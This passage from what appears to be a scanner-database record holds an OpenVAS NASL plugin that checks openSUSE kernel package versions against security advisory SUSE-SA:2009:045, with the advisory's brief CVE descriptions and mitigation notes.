e1000_clean_rx_irq\nfunction in drivers/net/e1000/e1000_main.c in the e1000 driver the\ne1000e driver in the Linux kernel, and Intel Wired Ethernet (aka\ne1000) before 7.5.5 allows remote attackers to cause a denial of\nservice (panic) via a crafted frame size.\n[openSUSE 11.0 only]\n\nThe mmap_min_addr sysctl is now enabled by default to protect\nagainst kernel NULL page exploits.\n[SLE11, openSUSE 11.0-11.1]\n\nThe -fno-delete-null-pointer-checks compiler option is now used to\nbuild the kernel to avoid gcc optimizing away NULL pointer checks.\nAlso -fwrapv is now used everywhere.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nThe kernel update also contains numerous other, non-security\nbug fixes. Please refer to the rpm changelog for a detailed list.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:045\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:045.\";\n\n \n\nif(description)\n{\n script_id(64761);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2008-5033\", \"CVE-2009-0676\", \"CVE-2009-1046\", \"CVE-2009-1385\", \"CVE-2009-1389\", \"CVE-2009-1630\", \"CVE-2009-1758\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:045 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-debug\", rpm:\"aufs-kmp-debug~cvs20081020_2.6.27.29_0.1~1.32.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-trace\", rpm:\"aufs-kmp-trace~cvs20081020_2.6.27.29_0.1~1.32.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brocade-bfa-kmp-debug\", rpm:\"brocade-bfa-kmp-debug~1.1.0.2_2.6.27.29_0.1~1.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brocade-bfa-kmp-trace\", rpm:\"brocade-bfa-kmp-trace~1.1.0.2_2.6.27.29_0.1~1.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dazuko-kmp-debug\", rpm:\"dazuko-kmp-debug~2.3.6_2.6.27.29_0.1~1.49.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dazuko-kmp-trace\", rpm:\"dazuko-kmp-trace~2.3.6_2.6.27.29_0.1~1.49.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"drbd-kmp-debug\", rpm:\"drbd-kmp-debug~8.2.7_2.6.27.29_0.1~1.19.25\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"drbd-kmp-trace\", rpm:\"drbd-kmp-trace~8.2.7_2.6.27.29_0.1~1.19.25\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"intel-iamt-heci-kmp-debug\", rpm:\"intel-iamt-heci-kmp-debug~3.1.0.31_2.6.27.29_0.1~2.40.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"intel-iamt-heci-kmp-trace\", rpm:\"intel-iamt-heci-kmp-trace~3.1.0.31_2.6.27.29_0.1~2.40.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"iscsitarget-kmp-debug\", rpm:\"iscsitarget-kmp-debug~0.4.15_2.6.27.29_0.1~89.11.18\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"iscsitarget-kmp-trace\", rpm:\"iscsitarget-kmp-trace~0.4.15_2.6.27.29_0.1~89.11.18\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-extra\", rpm:\"kernel-debug-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-extra\", rpm:\"kernel-pae-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-extra\", rpm:\"kernel-trace-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-extra\", rpm:\"kernel-xen-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kqemu-kmp-debug\", rpm:\"kqemu-kmp-debug~1.4.0pre1_2.6.27.29_0.1~2.1.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kqemu-kmp-trace\", rpm:\"kqemu-kmp-trace~1.4.0pre1_2.6.27.29_0.1~2.1.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kvm-kmp-trace\", rpm:\"kvm-kmp-trace~78_2.6.27.29_0.1~6.7.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lirc-kmp-trace\", rpm:\"lirc-kmp-trace~0.8.4_2.6.27.29_0.1~0.1.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ofed-kmp-debug\", rpm:\"ofed-kmp-debug~1.4_2.6.27.29_0.1~21.16.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ofed-kmp-trace\", rpm:\"ofed-kmp-trace~1.4_2.6.27.29_0.1~21.16.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"oracleasm-kmp-debug\", rpm:\"oracleasm-kmp-debug~2.0.5_2.6.27.29_0.1~2.36.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"oracleasm-kmp-trace\", rpm:\"oracleasm-kmp-trace~2.0.5_2.6.27.29_0.1~2.36.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcfclock-kmp-debug\", rpm:\"pcfclock-kmp-debug~0.44_2.6.27.29_0.1~227.56.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcfclock-kmp-trace\", rpm:\"pcfclock-kmp-trace~0.44_2.6.27.29_0.1~227.56.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-kmp-debug\", rpm:\"virtualbox-ose-kmp-debug~2.0.6_2.6.27.29_0.1~2.8.55\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-kmp-trace\", rpm:\"virtualbox-ose-kmp-trace~2.0.6_2.6.27.29_0.1~2.8.55\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"vmware-kmp-debug\", rpm:\"vmware-kmp-debug~2008.09.03_2.6.27.29_0.1~5.50.37\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"vmware-kmp-trace\", rpm:\"vmware-kmp-trace~2008.09.03_2.6.27.29_0.1~5.50.37\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acerhk-kmp-debug\", rpm:\"acerhk-kmp-debug~0.5.35_2.6.25.20_0.5~98.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acx-kmp-debug\", rpm:\"acx-kmp-debug~20080210_2.6.25.20_0.5~3.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"appleir-kmp-debug\", rpm:\"appleir-kmp-debug~1.1_2.6.25.20_0.5~108.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at76_usb-kmp-debug\", rpm:\"at76_usb-kmp-debug~0.17_2.6.25.20_0.5~2.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"atl2-kmp-debug\", rpm:\"atl2-kmp-debug~2.0.4_2.6.25.20_0.5~4.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-debug\", rpm:\"aufs-kmp-debug~cvs20080429_2.6.25.20_0.5~13.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dazuko-kmp-debug\", rpm:\"dazuko-kmp-debug~2.3.4.4_2.6.25.20_0.5~42.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"drbd-kmp-debug\", rpm:\"drbd-kmp-debug~8.2.6_2.6.25.20_0.5~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gspcav-kmp-debug\", rpm:\"gspcav-kmp-debug~01.00.20_2.6.25.20_0.5~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"iscsitarget-kmp-debug\", rpm:\"iscsitarget-kmp-debug~0.4.15_2.6.25.20_0.5~63.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ivtv-kmp-debug\", rpm:\"ivtv-kmp-debug~1.0.3_2.6.25.20_0.5~66.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kqemu-kmp-debug\", rpm:\"kqemu-kmp-debug~1.3.0pre11_2.6.25.20_0.5~7.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-debug\", rpm:\"nouveau-kmp-debug~0.10.1.20081112_2.6.25.20_0.5~0.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"omnibook-kmp-debug\", rpm:\"omnibook-kmp-debug~20080313_2.6.25.20_0.5~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcc-acpi-kmp-debug\", rpm:\"pcc-acpi-kmp-debug~0.9_2.6.25.20_0.5~4.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcfclock-kmp-debug\", rpm:\"pcfclock-kmp-debug~0.44_2.6.25.20_0.5~207.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tpctl-kmp-debug\", rpm:\"tpctl-kmp-debug~4.17_2.6.25.20_0.5~189.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"uvcvideo-kmp-debug\", rpm:\"uvcvideo-kmp-debug~r200_2.6.25.20_0.5~2.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-kmp-debug\", rpm:\"virtualbox-ose-kmp-debug~1.5.6_2.6.25.20_0.5~33.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"vmware-kmp-debug\", rpm:\"vmware-kmp-debug~2008.04.14_2.6.25.20_0.5~21.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wlan-ng-kmp-debug\", rpm:\"wlan-ng-kmp-debug~0.2.8_2.6.25.20_0.5~107.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~2.6.3~3.13.46\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debuginfo\", rpm:\"kernel-kdump-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debugsource\", rpm:\"kernel-kdump-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debuginfo\", rpm:\"kernel-ppc64-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debugsource\", rpm:\"kernel-ppc64-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debuginfo\", rpm:\"kernel-ps3-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debugsource\", rpm:\"kernel-ps3-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-base\", rpm:\"kernel-ppc64-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-extra\", rpm:\"kernel-ppc64-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3\", rpm:\"kernel-ps3~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debuginfo\", rpm:\"kernel-kdump-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debugsource\", rpm:\"kernel-kdump-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debuginfo\", rpm:\"kernel-ppc64-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debugsource\", rpm:\"kernel-ppc64-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debuginfo\", rpm:\"kernel-ps3-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debugsource\", rpm:\"kernel-ps3-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3\", rpm:\"kernel-ps3~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:24", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:045.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:045 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-1046", "CVE-2009-1385", "CVE-2009-1758", "CVE-2009-0676", "CVE-2008-5033", "CVE-2009-2407", "CVE-2009-1389", "CVE-2009-2406", "CVE-2009-1630"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064761", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064761", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_045.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:045 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are 